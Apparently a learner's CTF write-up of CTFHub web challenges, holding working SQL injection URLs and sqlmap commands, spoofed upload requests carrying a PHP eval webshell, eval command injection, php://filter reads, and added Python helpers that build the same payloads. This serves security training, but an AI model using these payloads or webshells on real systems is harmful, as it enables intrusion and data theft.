CTF Web Learning Notes
Date: 2023-01-16 05:00:00
CTFHUB——log (Git leak)
Use GitHack on Kali
python GitHack.py http://challenge-4be834ffe995c3a3.sandbox.ctfhub.com:10800/.git   /// the recovered repository is saved under the dist directory inside the GitHack directory; cd into it before running git
git log
git diff 91722f3ef9cad1bb2841623dd18efcf5966dbd32   // view the flag
CTFHUB——Stash (Git leak)
git stash list
git stash pop   // note: run with root privileges
CTFHUB——Index (Git leak)
python2 GitHack.py http://challenge-b30f32f8760f958c.sandbox.ctfhub.com:10800/.git
CTFHUB——SVN leak
// first cd into the tool directory
./rip-svn.pl -v -u http://challenge-db225928ae10d29a.sandbox.ctfhub.com:10800/.svn
ls -al
cd .svn/pristine/87   // pristine/ keeps a full copy of every versioned file, named by its SHA-1, so deleted files are still readable here
ls -al
cat 87cfa68f3ad388cc5010e87eb92ae7210a6564c9.svn-base
CTFHUB——HG leak
./rip-hg.pl -v -u http://challenge-fd4d14ab800ba8d3.sandbox.ctfhub.com:10800/.hg/
cd .hg/store
cat fncache   // lists data/flag_1296924402.txt.i, the revlog of the tracked file flag_1296924402.txt; request that file directly from the site
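All three leak challenges above work because the web server serves the repository metadata directory. The following is an added example, not part of the original notes or of GitHack/rip-svn.pl/rip-hg.pl: a probe that checks the tell-tale files and only reports a leak when the body looks like the real artifact (so a soft-404 page that answers 200 to everything is not a false positive). The fetch function is injected; the fake site and the hostname target.example are constructed for the offline run, and the body heuristics are assumptions.

```python
"""Exposed-VCS-directory probe (added example, not from the write-up)."""
import re
from typing import Callable, Optional

Fetch = Callable[[str], Optional[bytes]]   # url -> body, or None on non-200/error

# path -> predicate on the response body (heuristics, assumptions)
PROBES = {
    ".git/HEAD": lambda b: b.startswith(b"ref: refs/") or re.fullmatch(rb"[0-9a-f]{40}\s*", b) is not None,
    ".git/config": lambda b: b.lstrip().startswith(b"[core]"),
    ".svn/wc.db": lambda b: b.startswith(b"SQLite format 3\x00"),     # SVN >= 1.7 working copy
    ".svn/entries": lambda b: re.match(rb"\d+\n", b) is not None,      # SVN < 1.7 format-number header
    ".hg/requires": lambda b: b"revlogv1" in b,
    ".hg/store/fncache": lambda b: b.startswith((b"data/", b"meta/")),
}


def probe(base_url: str, fetch: Fetch) -> dict:
    """Return {path: leaked?} for every probe path under base_url."""
    base = base_url.rstrip("/") + "/"
    found = {}
    for path, looks_real in PROBES.items():
        body = fetch(base + path)
        found[path] = body is not None and looks_real(body)
    return found


def http_fetch(url: str) -> Optional[bytes]:
    """Real fetcher for live use; not called by the offline demo below."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            return r.read()
    except (urllib.error.URLError, OSError):
        return None


# Constructed fake site: leaks .git, and answers every other path with a generic 200 HTML page.
FAKE_SITE = {
    "http://target.example/.git/HEAD": b"ref: refs/heads/master\n",
    "http://target.example/.git/config": b"[core]\n\trepositoryformatversion = 0\n",
}


def fake_fetch(url: str) -> Optional[bytes]:
    return FAKE_SITE.get(url, b"<html>Not Found</html>")   # soft-404 behaviour


if __name__ == "__main__":
    for path, leaked in probe("http://target.example", fake_fetch).items():
        print(f"{'LEAK' if leaked else ' ok '}  {path}")
```

Against a live target, pass http_fetch instead of fake_fetch; the same heuristics then tell a real .git/HEAD apart from a catch-all page before you point GitHack at it.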
CTFHUB——SQL integer injection
// find the number of columns
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=1 order by 2
// find which columns are echoed
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,2
// current database
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,database()
// all databases
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
// tables in sqli
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
// columns of sqli.flag
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name='flag' and table_schema='sqli'
// the flag
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(flag)from sqli.flag
# With sqlmap (the option to list databases is --dbs)
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 --current-db
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 --dbs
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --batch
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns --batch
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump
CTFHUB——SQL string (character) injection
1. Appending a single quote causes an error
http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1'
2. Append ' and 1=1 -- '
http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1'and 1=1 -- '   /// note the space after the comment marker "--"
3. Append ' and 1=2 -- ' : error
These three steps confirm a string-type injection.
order by: if the number exceeds the column count the query errors; if it equals the column count, the result for $id=1 is shown
http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1' order by 2 -- '
Find the echoed positions
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,2 -- ''
Start dumping data
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,user() -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,version() -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,database() -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(schema_name)from information_schema.schemata -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli' -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag' -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(flag)from sqli.flag -- ''
# With sqlmap (the option to list databases is --dbs)
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --dbs --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch
CTFHUB——SQL error-based injection
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,database(),0x7e),1)
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1)
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema="sqli" and table_name='flag') ,0x7e),1)
# This only gives the left part of the flag: the XPATH error message returned by updatexml() shows at most 32 characters
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag) ,0x7e),1)
# Use right() to display the other half
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag))from sqli.flag) ,31),0x7e),1)
# With sqlmap (the option to list databases is --dbs)
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --dbs --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch
CTFHUB——SQL Boolean blind injection
CTFHUB——MySQL structure
# For these two, using Burp Suite (BP) or sqlmap is recommended: every character has to be guessed through a true/false page difference
CTFHUB——Cookie injection
# With sqlmap (--level=2 makes it test Cookie values)
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 --dbs
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli --tables --batch
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ktyrpqqkjq -C dmcwxicbvc --dump
# With BP: the first request enumerates the columns of sqli.tjhiangrvk, the second dumps the column
GET / HTTP/1.1
Host: challenge-3d139840b13c5363.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 0,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='tjhiangrvk'; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

# Second request: dump the column
GET / HTTP/1.1
Host: challenge-3d139840b13c5363.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 0,igdqkfgoxs from sqli.tjhiangrvk; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
CTFHUB——User-Agent injection
# sqlmap (--level=3 makes it test the User-Agent header)
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=3 --dbs --batch
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=3 -D sqli -T dgcskfxmlw --dump --batch
# BP: the first request enumerates the columns of sqli.wexbewzepo, the second dumps the column
GET / HTTP/1.1
Host: challenge-6b012852328af0f2.sandbox.ctfhub.com:10800
User-Agent: -1 union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='wexbewzepo' #
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

# Second request: dump the column
GET / HTTP/1.1
Host: challenge-6b012852328af0f2.sandbox.ctfhub.com:10800
User-Agent: -1 union select 1,sxuftpsmzo from sqli.wexbewzepo #
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
CTFHUB——Referer injection
# sqlmap: raise --level to 5 (the Referer header is already tested from level 3 up); it may take a while
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=5 --dbs --batch
# In BP, submit the form (POST) first and then capture the request; only then does the request carry a Referer header
POST / HTTP/1.1
Host: challenge-c07172b49c84c52f.sandbox.ctfhub.com:10800
Content-Length: 4
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Origin: http://challenge-c07172b49c84c52f.sandbox.ctfhub.com:10800
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: -1 union select 1,group_concat(fxjlcnquao)from sqli.jutobmzrfj
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
id=1
CTFHUB——Space filtering
# sqlmap
py sqlmap.py -u http://challenge-9f6b26b103520285.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --tamper space2comment.py
(remaining steps omitted)
# Manual injection
Ways to bypass a space filter: /**/ (inline comment in place of each space), () (parenthesise expressions so no space is needed), %0a (newline)
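The following is an added example, not from the original notes, of what the space2comment tamper and the manual tricks above actually do. tamper() rewrites a payload without spaces; run_injected() is a constructed stand-in for the challenge endpoint (assumption: it rejects any input containing a space and concatenates the rest into `WHERE id=<input>`), backed by an in-memory SQLite database instead of the target's MySQL, which is enough to show that the rewritten query still parses and returns the union row.

```python
"""Space-filter bypass (added example, not from the write-up)."""
import sqlite3


def tamper(payload: str, method: str = "comment") -> str:
    """Replace every space with an equivalent token.

    comment : /**/ (inline comment; MySQL and SQLite both skip it)
    newline : a newline, which is the %0a in a URL; both engines treat it as whitespace
    The parentheses trick, e.g. union(select(1),(2)), is MySQL-specific and not exercised here.
    """
    replacement = {"comment": "/**/", "newline": "\n"}[method]
    return payload.replace(" ", replacement)


def space_filter_blocks(user_input: str) -> bool:
    """The filter the challenge applies (constructed stand-in): any literal space is rejected."""
    return " " in user_input


def run_injected(user_input: str) -> list:
    """Vulnerable endpoint stand-in: apply the filter, then string-concatenate into the query."""
    if space_filter_blocks(user_input):
        raise PermissionError("blocked: payload contains a space")
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, data TEXT);
        INSERT INTO news VALUES (1, 'hello');
        CREATE TABLE flag(flag TEXT);
        INSERT INTO flag VALUES ('flag{constructed_sample}');
    """)
    return conn.execute(f"SELECT id, data FROM news WHERE id={user_input}").fetchall()


PAYLOAD = "-1 union select 1,flag from flag"

if __name__ == "__main__":
    for method in ("comment", "newline"):
        rewritten = tamper(PAYLOAD, method)
        print(method, repr(rewritten), run_injected(rewritten))
```

The untampered PAYLOAD is rejected by the filter; both rewritten forms pass it and the database returns the flag row, which is exactly why a blacklist on one whitespace character is not a defence.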
CTFHUB——MIME bypass
POST / HTTP/1.1
Host: challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800
Content-Length: 311
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Origin: http://challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypThKx4ZJTFtPj3di
# This boundary only marks where each form part starts and ends; it is not what validates the file type
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarypThKx4ZJTFtPj3di
Content-Disposition: form-data; name="file"; filename="muma.php"
Content-Type: image/jpeg
# Change this!!! This per-part Content-Type is what the server checks, so set it to image/jpeg while keeping the .php filename
------WebKitFormBoundarypThKx4ZJTFtPj3di
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundarypThKx4ZJTFtPj3di--
CTFHUB——00 truncation
Capture the upload of muma.php in BP and edit the request as below. A %00 only truncates the path on old PHP (before 5.3.4), which is why it works here.
POST /?road=/var/www/html/upload/muma.php%00.jpg HTTP/1.1
# Change this!!! The decoded %00 in the road parameter ends the saved path at muma.php, so the .jpg suffix is dropped
Host: challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800
Content-Length: 318
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygRXig2JtdVHb7oLO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800/?road=/var/www/html/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarygRXig2JtdVHb7oLO
Content-Disposition: form-data; name="file"; filename="muma.php%00.jpg"
Content-Type: image/jpeg
------WebKitFormBoundarygRXig2JtdVHb7oLO
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundarygRXig2JtdVHb7oLO--
Then connect with AntSword (蚁剑) to <site URL>/upload/muma.php
CTFHUB——Double suffix
# Nest "php" inside "php" (e.g. muma.pphphp): the filter removes the string php once, which leaves .php
CTFHUB——File header check
Open a .gif file in Notepad and append a one-line webshell (一句话木马) after the existing content, so the GIF header stays at the front
Then capture the upload in BP and change the file extension to .php
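The four upload challenges (MIME bypass, 00 truncation, double suffix, file header check) each defeat one weak check. The following is an added example, not from the original notes: it builds the same multipart body Burp shows, with a spoofed part Content-Type and a GIF89a-prefixed PHP file, and puts each challenge's check (constructed stand-ins, assumptions about what the challenge validates) beside the one check they all lack, an extension whitelist on the final saved name. The webshell parameter name "ctfhub" is an assumption.

```python
"""Upload-filter bypasses and the missing check (added example, not from the write-up)."""
import re
import urllib.parse
import uuid

ONE_LINER = b'<?php @eval($_POST["ctfhub"]); ?>'   # one-line webshell; parameter name is an assumption


def gif_polyglot(php: bytes = ONE_LINER) -> bytes:
    """File-header check: GIF magic followed by PHP. A magic-number check passes, and
    PHP ignores everything before <?php, so the code runs if saved under a .php name."""
    return b"GIF89a" + php


def build_multipart(filename: str, content_type: str, data: bytes, field: str = "file") -> tuple:
    """Return (Content-Type header value, body) for the upload form shown in Burp.
    MIME bypass = content_type="image/jpeg" together with a .php filename."""
    boundary = "----WebKitFormBoundary" + uuid.uuid4().hex[:16]
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    tail = (f"\r\n--{boundary}\r\n"
            'Content-Disposition: form-data; name="submit"\r\n\r\nSubmit\r\n'
            f"--{boundary}--\r\n").encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


# ---- what each challenge checks (constructed stand-ins) ----

def mime_check(content_type: str) -> bool:
    """MIME challenge: trusts the client-supplied part Content-Type."""
    return content_type in ("image/jpeg", "image/png", "image/gif")


def magic_check(data: bytes) -> bool:
    """File-header challenge: only inspects the first bytes."""
    return data[:6] in (b"GIF87a", b"GIF89a") or data[:3] == b"\xff\xd8\xff"


def strip_php_once(filename: str) -> str:
    """Double-suffix challenge: the string 'php' is deleted once, so muma.pphphp -> muma.php."""
    return filename.replace("php", "", 1)


def legacy_save_path(road_param: str) -> str:
    """00-truncation challenge: PHP < 5.3.4 treated paths as C strings, so the decoded
    %00 terminates the name and the trailing .jpg is lost."""
    return urllib.parse.unquote(road_param).split("\x00", 1)[0]


# ---- the check the challenges lack ----

SAFE_EXT = re.compile(r"\.(jpe?g|png|gif)\Z", re.IGNORECASE)


def whitelist_check(final_name: str) -> bool:
    """Whitelist the extension of the name the file will actually be saved as."""
    return SAFE_EXT.search(final_name) is not None


if __name__ == "__main__":
    ct, body = build_multipart("muma.php", "image/jpeg", gif_polyglot())
    print(ct)
    print(body.decode())
```

Every bypass on the page passes its own check and fails whitelist_check on the final name, which is the point: validate the name that hits disk after all decoding and renaming, not the client's MIME type or the first six bytes.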
CTFHUB——eval execution
http://challenge-762e9e51ed72cd7d.sandbox.ctfhub.com:10800/?cmd=system("ls /");
http://challenge-762e9e51ed72cd7d.sandbox.ctfhub.com:10800/?cmd=system("cat /flag_6055");
CTFHUB——File inclusion
# The source uses include; first include shell.txt, which already exists in the directory
http://challenge-d95f20cfaac12c8b.sandbox.ctfhub.com:10800/?file=shell.txt
# Then POST the data
ctfhub=system("ls /");
ctfhub=system("cat /flag");
CTFHUB——php://input
# Capture in BP, change the method to POST, set file=php://input (with this wrapper, include reads the request body as PHP), and put the PHP code to run in the body
POST /?file=php://input HTTP/1.1
Host: challenge-8a0b4a527d4aa825.sandbox.ctfhub.com:10800
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type:application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 33
CTFHUB——Read source code
# We know the flag is at /flag
So build the URL directly: http://challenge-f9c9636bfed0d1bb.sandbox.ctfhub.com:10800/?file=php://filter/resource=/flag
# Or have it output base64-encoded (this also works for files containing PHP, which would otherwise be executed instead of displayed)
http://challenge-f9c9636bfed0d1bb.sandbox.ctfhub.com:10800/?file=php://filter/read=convert.base64-encode/resource=/flag